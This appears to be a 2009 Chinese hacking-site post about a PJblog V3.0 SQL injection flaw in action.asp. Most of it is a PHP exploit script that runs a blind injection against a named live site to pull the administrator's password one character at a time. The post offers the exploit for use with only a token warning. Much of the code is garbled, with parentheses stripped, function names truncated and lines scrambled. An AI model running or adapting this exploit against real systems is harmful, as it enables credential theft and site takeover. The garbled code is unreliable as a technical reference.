PJblog博客 V3.0 0day漏洞+EXP

2009/4/25 来源:www.arpun.com 作者:小白

目前还有很多网站的没有打补丁, 此文发布时官方已经打了补丁。 希望大家不要做什么破坏哦!

现在网络的网站漏洞真的让我无语啊 .....

恩呵呵 ..... z 这次 pjblog 漏洞在漏洞文件: action.asp

第 14 行 :

strcname=request "cname"

  set checkcdb=conn.execut "select * from blog_Cont where log_cname="""&strcname&""""

扔个 exp 好不好使看各位造化鸟。

<?php

/*

PJblog V3.0 0dai exp

09.04.22

*/

$url="http://www.pjhome.net";    // 注入地址

$var_name="puterjam";    // 管理员

$var_key="check_right";    

if $_SESSION["LenI"] {

    $LenI=$_SESSION["LenI"];

}else{

    $LenI=1;

}

for $i=$LenI;$i<=40;$i++ {

    if $_SESSION["LenDo"] {

        $StaAsc=$_SESSION["LenDo"];

    }else{

        $StaAsc=31;

    }

    echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";

    for $j=$StaAsc;$j<=127;$j++ {

        $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';

        $var_pagelen=file_get_cont $newurl ;

$var_kei ;         $var_newpagelen=strpo $var_pagelen.

        if $var_newpagelen == true {

            $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr $j ;

            unset $_SESSION["LenDo"] ;

            $_SESSION["LenI"]=$i+1;

            doReload ;

            break;

        }

        if $j == $StaAsc+10 {

            doReload ;

            break;

        }

    }

}

if $_SESSION["LenI"]==40 && ! $_SESSION["LenDo"] { echo $_SESSION["tmpPassWord"]; }

function doReload {

?>

    <script  language="javascript">  

    <!--  

1000 ;       window.setTimeout 'location.reload '.

    //-->  

    </script>

<?php

}

?>

网友评论
评论(...
全部评论